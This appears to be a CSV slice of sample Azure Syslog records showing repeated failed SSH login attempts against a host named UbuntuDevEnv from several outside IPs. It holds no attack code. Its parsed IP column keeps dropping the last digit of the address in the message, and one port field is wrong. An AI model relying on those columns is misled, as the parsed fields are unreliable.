+3750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:22,UbuntuDevEnv,2019-06-26 13:18:21,auth,UbuntuDevEnv,info,Invalid user admin from 201.48.54.81 port 56460,123143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,201.48.54.8,56460,,
+3751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:22,UbuntuDevEnv,2019-06-26 13:18:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,123143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:22,UbuntuDevEnv,2019-06-26 13:18:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,123143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:23,UbuntuDevEnv,2019-06-26 13:18:23,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 201.48.54.81 port 56460 ssh2,123143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,201.48.54.8,56460,,
+3754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:24,UbuntuDevEnv,2019-06-26 13:18:23,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 56460:11: Bye Bye [preauth],123143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,56460,,
+3755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:24,UbuntuDevEnv,2019-06-26 13:18:23,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 201.48.54.81 port 56460 [preauth],123143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,201.48.54.8,56460,,
+3756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:27,UbuntuDevEnv,2019-06-26 13:18:26,auth,UbuntuDevEnv,info,Invalid user jie from 139.199.34.112 port 60260,123159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jie,139.199.34.1,60260,,
+3757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:27,UbuntuDevEnv,2019-06-26 13:18:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,123159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+3758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:27,UbuntuDevEnv,2019-06-26 13:18:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,123159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:29,UbuntuDevEnv,2019-06-26 13:18:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144  user=test,123165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,196.46.36.1,,0,
+3760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:29,UbuntuDevEnv,2019-06-26 13:18:29,auth,UbuntuDevEnv,info,Failed password for invalid user jie from 139.199.34.112 port 60260 ssh2,123159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jie,139.199.34.1,60260,,
+3761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:30,UbuntuDevEnv,2019-06-26 13:18:29,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 60260:11: Bye Bye [preauth],123159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,60260,,
+3762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:30,UbuntuDevEnv,2019-06-26 13:18:29,auth,UbuntuDevEnv,info,Disconnected from invalid user jie 139.199.34.112 port 60260 [preauth],123159,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jie,139.199.34.1,60260,,
+3763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:31,UbuntuDevEnv,2019-06-26 13:18:30,auth,UbuntuDevEnv,info,Failed password for test from 196.46.36.144 port 45905 ssh2,123165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,45905,,
+3764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:31,UbuntuDevEnv,2019-06-26 13:18:30,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 45905:11: Bye Bye [preauth],123165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,45905,,
+3765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:31,UbuntuDevEnv,2019-06-26 13:18:30,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 196.46.36.144 port 45905 [preauth],123165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,196.46.36.1,45905,,
+3766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:02,UbuntuDevEnv,2019-06-26 13:20:01,auth,UbuntuDevEnv,info,Invalid user filter from 157.230.115.27 port 34706,123491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,filter,157.230.115.2,34706,,
+3767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:02,UbuntuDevEnv,2019-06-26 13:20:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,123491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:02,UbuntuDevEnv,2019-06-26 13:20:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,123491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+3769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:03,UbuntuDevEnv,2019-06-26 13:20:03,auth,UbuntuDevEnv,info,Failed password for invalid user filter from 157.230.115.27 port 34706 ssh2,123491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,filter,157.230.115.2,34706,,
+3770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:03,UbuntuDevEnv,2019-06-26 13:20:03,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 34706:11: Bye Bye [preauth],123491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,34706,,
+3771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:03,UbuntuDevEnv,2019-06-26 13:20:03,auth,UbuntuDevEnv,info,Disconnected from invalid user filter 157.230.115.27 port 34706 [preauth],123491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,filter,157.230.115.2,34706,,
+3772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:14,UbuntuDevEnv,2019-06-26 13:20:13,auth,UbuntuDevEnv,info,Invalid user projectcars from 201.48.54.81 port 36626,123539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,projectcars,201.48.54.8,36626,,
+3773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:14,UbuntuDevEnv,2019-06-26 13:20:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,123539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:14,UbuntuDevEnv,2019-06-26 13:20:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,123539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:15,UbuntuDevEnv,2019-06-26 13:20:15,auth,UbuntuDevEnv,info,Failed password for invalid user projectcars from 201.48.54.81 port 36626 ssh2,123539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,projectcars,201.48.54.8,36626,,
+3776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:15,UbuntuDevEnv,2019-06-26 13:20:15,auth,UbuntuDevEnv,info,Disconnected from invalid user projectcars 201.48.54.81 port 36626 [preauth],123539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,projectcars,201.48.54.8,36626,,
+3777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:15,UbuntuDevEnv,2019-06-26 13:20:15,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 36626:11: Bye Bye [preauth],123539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,36626,,
+3778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:50,UbuntuDevEnv,2019-06-26 13:20:49,auth,UbuntuDevEnv,info,Invalid user we from 194.228.3.191 port 39352,123969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,we,194.228.3.1,39352,,
+3779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:50,UbuntuDevEnv,2019-06-26 13:20:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,123969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:50,UbuntuDevEnv,2019-06-26 13:20:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,123969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:52,UbuntuDevEnv,2019-06-26 13:20:51,auth,UbuntuDevEnv,info,Failed password for invalid user we from 194.228.3.191 port 39352 ssh2,123969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,we,194.228.3.1,39352,,
+3782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:52,UbuntuDevEnv,2019-06-26 13:20:51,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 39352:11: Bye Bye [preauth],123969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,39352,,
+3783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:20:52,UbuntuDevEnv,2019-06-26 13:20:51,auth,UbuntuDevEnv,info,Disconnected from invalid user we 194.228.3.191 port 39352 [preauth],123969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,we,194.228.3.1,39352,,
+3784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:19,UbuntuDevEnv,2019-06-26 13:22:19,auth,UbuntuDevEnv,info,Invalid user joseluis from 201.48.54.81 port 45023,124372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,joseluis,201.48.54.8,45023,,
+3785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:19,UbuntuDevEnv,2019-06-26 13:22:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,124372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:19,UbuntuDevEnv,2019-06-26 13:22:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,124372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:21,UbuntuDevEnv,2019-06-26 13:22:21,auth,UbuntuDevEnv,info,Failed password for invalid user joseluis from 201.48.54.81 port 45023 ssh2,124372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,joseluis,201.48.54.8,45023,,
+3788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:22,UbuntuDevEnv,2019-06-26 13:22:21,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 45023:11: Bye Bye [preauth],124372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,45023,,
+3789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:22,UbuntuDevEnv,2019-06-26 13:22:21,auth,UbuntuDevEnv,info,Disconnected from invalid user joseluis 201.48.54.81 port 45023 [preauth],124372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,joseluis,201.48.54.8,45023,,
+3790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:22,UbuntuDevEnv,2019-06-26 13:22:21,auth,UbuntuDevEnv,info,Invalid user vagrant from 194.228.3.191 port 47869,124396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,194.228.3.1,47869,,
+3791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:22,UbuntuDevEnv,2019-06-26 13:22:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,124396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:22,UbuntuDevEnv,2019-06-26 13:22:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,124396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:24,UbuntuDevEnv,2019-06-26 13:22:24,auth,UbuntuDevEnv,info,Failed password for invalid user vagrant from 194.228.3.191 port 47869 ssh2,124396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,194.228.3.1,47869,,
+3794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:24,UbuntuDevEnv,2019-06-26 13:22:24,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 47869:11: Bye Bye [preauth],124396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,47869,,
+3795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:24,UbuntuDevEnv,2019-06-26 13:22:24,auth,UbuntuDevEnv,info,Disconnected from invalid user vagrant 194.228.3.191 port 47869 [preauth],124396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,194.228.3.1,47869,,
+3796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:39,UbuntuDevEnv,2019-06-26 13:22:39,auth,UbuntuDevEnv,info,Invalid user zei from 139.199.34.112 port 35378,124450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zei,139.199.34.1,35378,,
+3797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:39,UbuntuDevEnv,2019-06-26 13:22:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,124450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:39,UbuntuDevEnv,2019-06-26 13:22:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,124450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+3799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:41,UbuntuDevEnv,2019-06-26 13:22:41,auth,UbuntuDevEnv,info,Failed password for invalid user zei from 139.199.34.112 port 35378 ssh2,124450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zei,139.199.34.1,35378,,
+3800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:42,UbuntuDevEnv,2019-06-26 13:22:41,auth,UbuntuDevEnv,info,Disconnected from invalid user zei 139.199.34.112 port 35378 [preauth],124450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zei,139.199.34.1,35378,,
+3801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:22:42,UbuntuDevEnv,2019-06-26 13:22:41,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 35378:11: Bye Bye [preauth],124450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,35378,,
+3802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:19,UbuntuDevEnv,2019-06-26 13:23:19,auth,UbuntuDevEnv,info,Invalid user support from 209.97.187.108 port 58492,124596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,209.97.187.1,58492,,
+3803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:19,UbuntuDevEnv,2019-06-26 13:23:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,124596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:19,UbuntuDevEnv,2019-06-26 13:23:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=209.97.187.108,124596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,209.97.187.1,,0,
+3805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:21,UbuntuDevEnv,2019-06-26 13:23:21,auth,UbuntuDevEnv,info,Failed password for invalid user support from 209.97.187.108 port 58492 ssh2,124596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,209.97.187.1,58492,,
+3806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:21,UbuntuDevEnv,2019-06-26 13:23:21,auth,UbuntuDevEnv,info,"Received disconnect from 209.97.187.108 port 58492:11: Normal Shutdown, Thank you for playing [preauth]",124596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,209.97.187.1,58492,,
+3807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:21,UbuntuDevEnv,2019-06-26 13:23:21,auth,UbuntuDevEnv,info,Disconnected from invalid user support 209.97.187.108 port 58492 [preauth],124596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,209.97.187.1,209,,
+3808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:40,UbuntuDevEnv,2019-06-26 13:23:40,auth,UbuntuDevEnv,info,Invalid user teste from 157.230.115.27 port 41196,124670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste,157.230.115.2,41196,,
+3809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:23:40,UbuntuDevEnv,2019-06-26 13:23:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,124670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
